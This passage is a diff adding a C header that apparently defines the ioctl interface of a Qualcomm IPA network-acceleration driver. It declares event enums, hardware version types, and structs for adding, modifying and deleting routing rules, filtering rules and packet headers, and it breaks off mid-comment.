+ * wlan wdi enable: wdi data path completed
+ * wlan wdi disable: wdi data path teardown
+ */
+enum ipa_wlan_event {
+ WLAN_CLIENT_CONNECT,
+ WLAN_CLIENT_DISCONNECT,
+ WLAN_CLIENT_POWER_SAVE_MODE,
+ WLAN_CLIENT_NORMAL_MODE,
+ SW_ROUTING_ENABLE,
+ SW_ROUTING_DISABLE,
+ WLAN_AP_CONNECT,
+ WLAN_AP_DISCONNECT,
+ WLAN_STA_CONNECT,
+ WLAN_STA_DISCONNECT,
+ WLAN_CLIENT_CONNECT_EX,
+ WLAN_SWITCH_TO_SCC,
+ WLAN_SWITCH_TO_MCC,
+ WLAN_WDI_ENABLE,
+ WLAN_WDI_DISABLE,
+ IPA_WLAN_EVENT_MAX
+};
+
+/**
+ * enum ipa_wan_event - Events for wan client
+ *
+ * wan default route add/del
+ * wan embms connect: New wan embms interface connected
+ */
+enum ipa_wan_event {
+ WAN_UPSTREAM_ROUTE_ADD = IPA_WLAN_EVENT_MAX,
+ WAN_UPSTREAM_ROUTE_DEL,
+ WAN_EMBMS_CONNECT,
+ WAN_XLAT_CONNECT,
+ IPA_WAN_EVENT_MAX
+};
+
+enum ipa_ecm_event {
+ ECM_CONNECT = IPA_WAN_EVENT_MAX,
+ ECM_DISCONNECT,
+ IPA_ECM_EVENT_MAX,
+};
+
+enum ipa_tethering_stats_event {
+ IPA_TETHERING_STATS_UPDATE_STATS = IPA_ECM_EVENT_MAX,
+ IPA_TETHERING_STATS_UPDATE_NETWORK_STATS,
+ IPA_TETHERING_STATS_EVENT_MAX,
+ IPA_EVENT_MAX_NUM = IPA_TETHERING_STATS_EVENT_MAX
+};
+
+#define IPA_EVENT_MAX ((int)IPA_EVENT_MAX_NUM)
+
+/**
+ * enum ipa_rm_resource_name - IPA RM clients identification names
+ *
+ * Add new mapping to ipa_rm_prod_index() / ipa_rm_cons_index()
+ * when adding new entry to this enum.
+ */
+enum ipa_rm_resource_name {
+ IPA_RM_RESOURCE_PROD = 0,
+ IPA_RM_RESOURCE_Q6_PROD = IPA_RM_RESOURCE_PROD,
+ IPA_RM_RESOURCE_USB_PROD,
+ IPA_RM_RESOURCE_USB_DPL_DUMMY_PROD,
+ IPA_RM_RESOURCE_HSIC_PROD,
+ IPA_RM_RESOURCE_STD_ECM_PROD,
+ IPA_RM_RESOURCE_RNDIS_PROD,
+ IPA_RM_RESOURCE_WWAN_0_PROD,
+ IPA_RM_RESOURCE_WLAN_PROD,
+ IPA_RM_RESOURCE_ODU_ADAPT_PROD,
+ IPA_RM_RESOURCE_MHI_PROD,
+ IPA_RM_RESOURCE_PROD_MAX,
+
+ IPA_RM_RESOURCE_Q6_CONS = IPA_RM_RESOURCE_PROD_MAX,
+ IPA_RM_RESOURCE_USB_CONS,
+ IPA_RM_RESOURCE_USB_DPL_CONS,
+ IPA_RM_RESOURCE_HSIC_CONS,
+ IPA_RM_RESOURCE_WLAN_CONS,
+ IPA_RM_RESOURCE_APPS_CONS,
+ IPA_RM_RESOURCE_ODU_ADAPT_CONS,
+ IPA_RM_RESOURCE_MHI_CONS,
+ IPA_RM_RESOURCE_MAX
+};
+
+/**
+ * enum ipa_hw_type - IPA hardware version type
+ * @IPA_HW_None: IPA hardware version not defined
+ * @IPA_HW_v1_0: IPA hardware version 1.0
+ * @IPA_HW_v1_1: IPA hardware version 1.1
+ * @IPA_HW_v2_0: IPA hardware version 2.0
+ * @IPA_HW_v2_1: IPA hardware version 2.1
+ * @IPA_HW_v2_5: IPA hardware version 2.5
+ * @IPA_HW_v2_6: IPA hardware version 2.6
+ * @IPA_HW_v2_6L: IPA hardware version 2.6L
+ * @IPA_HW_v3_0: IPA hardware version 3.0
+ */
+enum ipa_hw_type {
+ IPA_HW_None = 0,
+ IPA_HW_v1_0 = 1,
+ IPA_HW_v1_1 = 2,
+ IPA_HW_v2_0 = 3,
+ IPA_HW_v2_1 = 4,
+ IPA_HW_v2_5 = 5,
+ IPA_HW_v2_6 = IPA_HW_v2_5,
+ IPA_HW_v2_6L = 6,
+ IPA_HW_v3_0 = 10,
+ IPA_HW_v3_1 = 11,
+ IPA_HW_MAX
+};
+
+/**
+ * struct ipa_rule_attrib - attributes of a routing/filtering
+ * rule, all in LE
+ * @attrib_mask: what attributes are valid
+ * @src_port_lo: low port of src port range
+ * @src_port_hi: high port of src port range
+ * @dst_port_lo: low port of dst port range
+ * @dst_port_hi: high port of dst port range
+ * @type: ICMP/IGMP type
+ * @code: ICMP/IGMP code
+ * @spi: IPSec SPI
+ * @src_port: exact src port
+ * @dst_port: exact dst port
+ * @meta_data: meta-data val
+ * @meta_data_mask: meta-data mask
+ * @u.v4.tos: type of service
+ * @u.v4.protocol: protocol
+ * @u.v4.src_addr: src address value
+ * @u.v4.src_addr_mask: src address mask
+ * @u.v4.dst_addr: dst address value
+ * @u.v4.dst_addr_mask: dst address mask
+ * @u.v6.tc: traffic class
+ * @u.v6.flow_label: flow label
+ * @u.v6.next_hdr: next header
+ * @u.v6.src_addr: src address val
+ * @u.v6.src_addr_mask: src address mask
+ * @u.v6.dst_addr: dst address val
+ * @u.v6.dst_addr_mask: dst address mask
+ */
+struct ipa_rule_attrib {
+ uint32_t attrib_mask;
+ uint16_t src_port_lo;
+ uint16_t src_port_hi;
+ uint16_t dst_port_lo;
+ uint16_t dst_port_hi;
+ uint8_t type;
+ uint8_t code;
+ uint8_t tos_value;
+ uint8_t tos_mask;
+ uint32_t spi;
+ uint16_t src_port;
+ uint16_t dst_port;
+ uint32_t meta_data;
+ uint32_t meta_data_mask;
+ uint8_t src_mac_addr[ETH_ALEN];
+ uint8_t src_mac_addr_mask[ETH_ALEN];
+ uint8_t dst_mac_addr[ETH_ALEN];
+ uint8_t dst_mac_addr_mask[ETH_ALEN];
+ uint16_t ether_type;
+ union {
+ struct {
+ uint8_t tos;
+ uint8_t protocol;
+ uint32_t src_addr;
+ uint32_t src_addr_mask;
+ uint32_t dst_addr;
+ uint32_t dst_addr_mask;
+ } v4;
+ struct {
+ uint8_t tc;
+ uint32_t flow_label;
+ uint8_t next_hdr;
+ uint32_t src_addr[4];
+ uint32_t src_addr_mask[4];
+ uint32_t dst_addr[4];
+ uint32_t dst_addr_mask[4];
+ } v6;
+ } u;
+};
+
+/*! @brief The maximum number of Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of IHL offset Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of Mask Equal 128 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_128_EQNS 2
+
+/*! @brief The maximum number of IHL offset Range Check 16 Eqns */
+#define IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS 2
+
+/*! @brief Offset and 16 bit comparison equation */
+struct ipa_ipfltr_eq_16 {
+ int8_t offset;
+ uint16_t value;
+};
+
+/*! @brief Offset and 32 bit comparison equation */
+struct ipa_ipfltr_eq_32 {
+ int8_t offset;
+ uint32_t value;
+};
+
+/*! @brief Offset and 128 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_128 {
+ int8_t offset;
+ uint8_t mask[16];
+ uint8_t value[16];
+};
+
+/*! @brief Offset and 32 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_32 {
+ int8_t offset;
+ uint32_t mask;
+ uint32_t value;
+};
+
+/*! @brief Equation for identifying a range. Ranges are inclusive */
+struct ipa_ipfltr_range_eq_16 {
+ int8_t offset;
+ uint16_t range_low;
+ uint16_t range_high;
+};
+
+/*! @brief Rule equations which are set according to DS filter installation */
+struct ipa_ipfltri_rule_eq {
+ /*! 16-bit Bitmask to indicate how many eqs are valid in this rule */
+ uint16_t rule_eq_bitmap;
+ /*! Specifies if a type of service check rule is present */
+ uint8_t tos_eq_present;
+ /*! The value to check against the type of service (ipv4) field */
+ uint8_t tos_eq;
+ /*! Specifies if a protocol check rule is present */
+ uint8_t protocol_eq_present;
+ /*! The value to check against the protocol (ipv6) field */
+ uint8_t protocol_eq;
+ /*! The number of ip header length offset 16 bit range check
+ * rules in this rule */
+ uint8_t num_ihl_offset_range_16;
+ /*! An array of the registered ip header length offset 16 bit
+ * range check rules */
+ struct ipa_ipfltr_range_eq_16
+ ihl_offset_range_16[IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS];
+ /*! The number of mask equal 32 rules present in this rule */
+ uint8_t num_offset_meq_32;
+ /*! An array of all the possible mask equal 32 rules in this rule */
+ struct ipa_ipfltr_mask_eq_32
+ offset_meq_32[IPA_IPFLTR_NUM_MEQ_32_EQNS];
+ /*! Specifies if the traffic class rule is present in this rule */
+ uint8_t tc_eq_present;
+ /*! The value to check the traffic class (ipv4) field against */
+ uint8_t tc_eq;
+ /*! Specifies if the flow equals rule is present in this rule */
+ uint8_t fl_eq_present;
+ /*! The value to check the flow (ipv6) field against */
+ uint32_t fl_eq;
+ /*! The number of ip header length offset 16 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_16_present;
+ /*! The ip header length offset 16 bit equation */
+ struct ipa_ipfltr_eq_16 ihl_offset_eq_16;
+ /*! The number of ip header length offset 32 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_32_present;
+ /*! The ip header length offset 32 bit equation */
+ struct ipa_ipfltr_eq_32 ihl_offset_eq_32;
+ /*! The number of ip header length offset 32 bit mask equations in
+ * this rule */
+ uint8_t num_ihl_offset_meq_32;
+ /*! The ip header length offset 32 bit mask equation */
+ struct ipa_ipfltr_mask_eq_32
+ ihl_offset_meq_32[IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS];
+ /*! The number of ip header length offset 128 bit equations in this
+ * rule */
+ uint8_t num_offset_meq_128;
+ /*! The ip header length offset 128 bit equation */
+ struct ipa_ipfltr_mask_eq_128
+ offset_meq_128[IPA_IPFLTR_NUM_MEQ_128_EQNS];
+ /*! The metadata 32 bit masked comparison equation present or not */
+ /* Metadata based rules are added internally by IPA driver */
+ uint8_t metadata_meq32_present;
+ /*! The metadata 32 bit masked comparison equation */
+ struct ipa_ipfltr_mask_eq_32 metadata_meq32;
+ /*! Specifies if the Fragment equation is present in this rule */
+ uint8_t ipv4_frag_eq_present;
+};
+
+/**
+ * struct ipa_flt_rule - attributes of a filtering rule
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ * @to_uc: bool switch to pass packet to micro-controller
+ * @action: action field
+ * @rt_tbl_hdl: handle of table from "get"
+ * @attrib: attributes of the rule
+ * @eq_attrib: attributes of the rule in equation form (valid when
+ * eq_attrib_type is true)
+ * @rt_tbl_idx: index of RT table referred to by filter rule (valid when
+ * eq_attrib_type is true and non-exception action)
+ * @eq_attrib_type: true if equation level form used to specify attributes
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @rule_id: rule_id to be assigned to the filter rule. In case client specifies
+ * rule_id as 0 the driver will assign a new rule_id
+ */
+struct ipa_flt_rule {
+ uint8_t retain_hdr;
+ uint8_t to_uc;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_hdl;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ uint32_t rt_tbl_idx;
+ uint8_t eq_attrib_type;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint16_t rule_id;
+};
+
+/**
+ * enum ipa_hdr_l2_type - L2 header type
+ * IPA_HDR_L2_NONE: L2 header which isn't Ethernet II and isn't 802_3
+ * IPA_HDR_L2_ETHERNET_II: L2 header of type Ethernet II
+ * IPA_HDR_L2_802_3: L2 header of type 802_3
+ */
+enum ipa_hdr_l2_type {
+ IPA_HDR_L2_NONE,
+ IPA_HDR_L2_ETHERNET_II,
+ IPA_HDR_L2_802_3,
+ IPA_HDR_L2_MAX,
+};
+
+/**
+ * enum ipa_hdr_l2_type - Processing context type
+ * IPA_HDR_PROC_NONE: No processing context
+ * IPA_HDR_PROC_ETHII_TO_ETHII: Process Ethernet II to Ethernet II
+ * IPA_HDR_PROC_ETHII_TO_802_3: Process Ethernet II to 802_3
+ * IPA_HDR_PROC_802_3_TO_ETHII: Process 802_3 to Ethernet II
+ * IPA_HDR_PROC_802_3_TO_802_3: Process 802_3 to 802_3
+ */
+enum ipa_hdr_proc_type {
+ IPA_HDR_PROC_NONE,
+ IPA_HDR_PROC_ETHII_TO_ETHII,
+ IPA_HDR_PROC_ETHII_TO_802_3,
+ IPA_HDR_PROC_802_3_TO_ETHII,
+ IPA_HDR_PROC_802_3_TO_802_3,
+ IPA_HDR_PROC_MAX,
+};
+
+/**
+ * struct ipa_rt_rule - attributes of a routing rule
+ * @dst: dst "client"
+ * @hdr_hdl: handle to the dynamic header
+ it is not an index or an offset
+ * @hdr_proc_ctx_hdl: handle to header processing context. if it is provided
+ hdr_hdl shall be 0
+ * @attrib: attributes of the rule
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ */
+struct ipa_rt_rule {
+ enum ipa_client_type dst;
+ uint32_t hdr_hdl;
+ uint32_t hdr_proc_ctx_hdl;
+ struct ipa_rule_attrib attrib;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint8_t retain_hdr;
+};
+
+/**
+ * struct ipa_hdr_add - header descriptor includes in and out
+ * parameters
+ * @name: name of the header
+ * @hdr: actual header to be inserted
+ * @hdr_len: size of above header
+ * @type: l2 header type
+ * @is_partial: header not fully specified
+ * @hdr_hdl: out parameter, handle to header, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_hdr_add {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint32_t hdr_hdl;
+ int status;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - header addition parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be written to IPA HW also?
+ * @num_hdrs: num of headers that follow
+ * @ipa_hdr_add hdr: all headers need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr {
+ uint8_t commit;
+ uint8_t num_hdrs;
+ struct ipa_hdr_add hdr[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_add - processing context descriptor includes
+ * in and out parameters
+ * @type: processing context type
+ * @hdr_hdl: in parameter, handle to header
+ * @proc_ctx_hdl: out parameter, handle to proc_ctx, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_add {
+ enum ipa_hdr_proc_type type;
+ uint32_t hdr_hdl;
+ uint32_t proc_ctx_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - processing context addition parameters (support
+ * multiple processing context and commit)
+ * @commit: should processing context be written to IPA HW also?
+ * @num_proc_ctxs: num of processing context that follow
+ * @proc_ctx: all processing context need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_proc_ctxs;
+ struct ipa_hdr_proc_ctx_add proc_ctx[0];
+};
+
+/**
+ * struct ipa_ioc_copy_hdr - retrieve a copy of the specified
+ * header - caller can then derive the complete header
+ * @name: name of the header resource
+ * @hdr: out parameter, contents of specified header,
+ * valid only when ioctl return val is non-negative
+ * @hdr_len: out parameter, size of above header
+ * valid only when ioctl return val is non-negative
+ * @type: l2 header type
+ * valid only when ioctl return val is non-negative
+ * @is_partial: out parameter, indicates whether specified header is partial
+ * valid only when ioctl return val is non-negative
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_ioc_copy_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_get_hdr - header entry lookup parameters, if lookup was
+ * successful caller must call put to release the reference count when done
+ * @name: name of the header resource
+ * @hdl: out parameter, handle of header entry
+ * valid only when ioctl return val is non-negative
+ */
+struct ipa_ioc_get_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_hdr_del - header descriptor includes in and out
+ * parameters
+ *
+ * @hdl: handle returned from header add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_hdr - header deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be removed from IPA HW also?
+ * @num_hdls: num of headers being removed
+ * @ipa_hdr_del hdl: all handles need to go here back to back, no pointers
+ */
+struct ipa_ioc_del_hdr {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_del hdl[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_del - processing context descriptor includes
+ * in and out parameters
+ * @hdl: handle returned from processing context add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * ipa_ioc_del_hdr_proc_ctx - processing context deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should processing contexts be removed from IPA HW also?
+ * @num_hdls: num of processing contexts being removed
+ * @ipa_hdr_proc_ctx_del hdl: all handles need to go here back to back,
+ * no pointers
+ */
+struct ipa_ioc_del_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_proc_ctx_del hdl[0];
+};
+
+/**
+ * struct ipa_rt_rule_add - routing rule descriptor includes in
+ * and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of routing table, it is NOT possible to add rules at
+ * the rear of the "default" routing tables
+ * @rt_rule_hdl: output parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of routing rule add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_add {
+ struct ipa_rt_rule rule;
+ uint8_t at_rear;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule - routing rule addition parameters (supports
+ * multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule_after - routing rule addition after a specific
+ * rule parameters(supports multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @add_after_hdl: the rules will be added after this specific rule
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ * at_rear field will be ignored when using this IOCTL
+ */
+struct ipa_ioc_add_rt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_mdfy - routing rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @rt_rule_hdl: handle to rule which supposed to modify
+ * @status: output parameter, status of routing rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_rt_rule_mdfy {
+ struct ipa_rt_rule rule;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_rt_rule - routing rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of routing rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_rt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_del - routing rule descriptor includes in
+ * and out parameters
+ * @hdl: handle returned from route rule add operation
+ * @status: output parameter, status of route rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_rt_rule - routing rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @ipa_rt_rule_del hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_rt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl_indx - routing table index lookup parameters
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @index: output parameter, routing table index, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl_indx {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t idx;
+};
+
+/**
+ * struct ipa_flt_rule_add - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of filtering table?
+ * @flt_rule_hdl: out parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of filtering rule add operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_add {
+ struct ipa_flt_rule rule;
+ uint8_t at_rear;
+ uint32_t flt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule - filtering rule addition parameters (supports
+ * multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * valid only when global is 0
+ * @global: does this apply to global filter table of specific IP family
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t global;
+ uint8_t num_rules;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule_after - filtering rule addition after specific
+ * rule parameters (supports multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * @num_rules: number of filtering rules that follow
+ * @add_after_hdl: rules will be added after the rule with this handle
+ * @rules: all rules need to go back to back here, no pointers. at rear field
+ * is ignored when using this IOCTL
+ */
+struct ipa_ioc_add_flt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_mdfy - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @flt_rule_hdl: handle to rule
+ * @status: output parameter, status of filtering rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_mdfy {
+ struct ipa_flt_rule rule;
+ uint32_t rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_flt_rule - filtering rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_flt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_del - filtering rule descriptor includes
+ * in and out parameters
+ *
+ * @hdl: handle returned from filtering rule add operation
+ * @status: output parameter, status of filtering rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_flt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_flt_rule - filtering rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_flt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl - routing table lookup parameters, if lookup was
+ * successful caller must call put to release the reference
+ * count when done
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @htl: output parameter, handle of routing table, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_ioc_query_intf - used to lookup number of tx and
+ * rx properties of interface
+ * @name: name of interface
+ * @num_tx_props: output parameter, number of tx properties
+ * valid only when ioctl return val is non-negative
+ * @num_rx_props: output parameter, number of rx properties
+ * valid only when ioctl return val is non-negative
+ * @num_ext_props: output parameter, number of ext properties
+ * valid only when ioctl return val is non-negative
+ * @excp_pipe: exception packets of this interface should be
+ * routed to this pipe
+ */
+struct ipa_ioc_query_intf {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ uint32_t num_rx_props;
+ uint32_t num_ext_props;
+ enum ipa_client_type excp_pipe;
+};
+
+/**
+ * struct ipa_ioc_tx_intf_prop - interface tx property
+ * @ip: IP family of routing rule
+ * @attrib: routing rule
+ * @dst_pipe: routing output pipe
+ * @alt_dst_pipe: alternate routing output pipe
+ * @hdr_name: name of associated header if any, empty string when no header
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_tx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type dst_pipe;
+ enum ipa_client_type alt_dst_pipe;
+ char hdr_name[IPA_RESOURCE_NAME_MAX];
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_tx_props - interface tx propertie
+ * @name: name of interface
+ * @num_tx_props: number of TX properties
+ * @tx[0]: output parameter, the tx properties go here back to back
+ */
+struct ipa_ioc_query_intf_tx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ struct ipa_ioc_tx_intf_prop tx[0];
+};
+
+/**
+ * struct ipa_ioc_ext_intf_prop - interface extended property
+ * @ip: IP family of routing rule
+ * @eq_attrib: attributes of the rule in equation form
+ * @action: action field
+ * @rt_tbl_idx: index of RT table referred to by filter rule
+ * @mux_id: MUX_ID
+ * @filter_hdl: handle of filter (as specified by provider of filter rule)
+ * @is_xlat_rule: it is xlat flt rule or not
+ */
+struct ipa_ioc_ext_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_idx;
+ uint8_t mux_id;
+ uint32_t filter_hdl;
+ uint8_t is_xlat_rule;
+ uint32_t rule_id;
+ uint8_t is_rule_hashable;
+};
+
+/**
+ * struct ipa_ioc_query_intf_ext_props - interface ext propertie
+ * @name: name of interface
+ * @num_ext_props: number of EXT properties
+ * @ext[0]: output parameter, the ext properties go here back to back
+ */
+struct ipa_ioc_query_intf_ext_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_ext_props;
+ struct ipa_ioc_ext_intf_prop ext[0];
+};
+
+/**
+ * struct ipa_ioc_rx_intf_prop - interface rx property
+ * @ip: IP family of filtering rule
+ * @attrib: filtering rule
+ * @src_pipe: input pipe
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_rx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type src_pipe;
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_rx_props - interface rx propertie
+ * @name: name of interface
+ * @num_rx_props: number of RX properties
+ * @rx: output parameter, the rx properties go here back to back
+ */
+struct ipa_ioc_query_intf_rx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_rx_props;
+ struct ipa_ioc_rx_intf_prop rx[0];
+};
+
+/**
+ * struct ipa_ioc_nat_alloc_mem - nat table memory allocation
+ * properties
+ * @dev_name: input parameter, the name of table
